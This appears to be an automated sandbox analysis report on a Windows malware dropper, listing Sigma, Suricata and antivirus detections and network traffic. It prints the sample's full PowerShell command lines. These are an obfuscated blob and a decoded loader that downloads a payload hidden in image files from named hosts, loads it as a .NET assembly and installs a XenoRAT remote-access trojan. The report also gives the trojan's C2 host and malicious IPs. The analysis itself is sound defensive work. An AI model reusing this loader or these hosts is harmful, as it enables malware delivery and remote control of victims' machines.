            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe, ProcessId: 6736, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Conve
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Conve

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-10T19:58:30.985287+010020204251Exploit Kit Activity Detected62.60.226.6480192.168.2.649759TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-10T19:58:11.329279+010020576351A Network Trojan was detected62.60.226.6480192.168.2.649759TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-10T19:58:24.723699+010020490381A Network Trojan was detected185.199.108.153443192.168.2.649711TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://62.60.226.64/public_files/Sjofbrd.txtAvira URL Cloud: Label: malware
            Source: https://ofice365.github.io/1/test.jpgAvira URL Cloud: Label: malware
            Source: https://ofice365.github.ioAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 9.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: XenoRAT {"C2 url": "failed2.myftp.org", "Mutex Name": "Winsock2Mutex", "Install Folder": "appdata"}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeVirustotal: Detection: 41%Perma Link
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeReversingLabs: Detection: 39%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6A1D830EC
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: Binary string: wextract.pdb source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: vbc.pdb source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6A1D8204C

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 62.60.226.64:80 -> 192.168.2.6:49759
            Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 62.60.226.64:80 -> 192.168.2.6:49759
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.153:443 -> 192.168.2.6:49711
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: failed2.myftp.org
            Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /public_files/Sjofbrd.txt HTTP/1.1Host: 62.60.226.64Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
            Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
            Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
            Source: Joe Sandbox ViewASN Name: ASLINE-AS-APASLINELIMITEDHK ASLINE-AS-APASLINELIMITEDHK
            Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
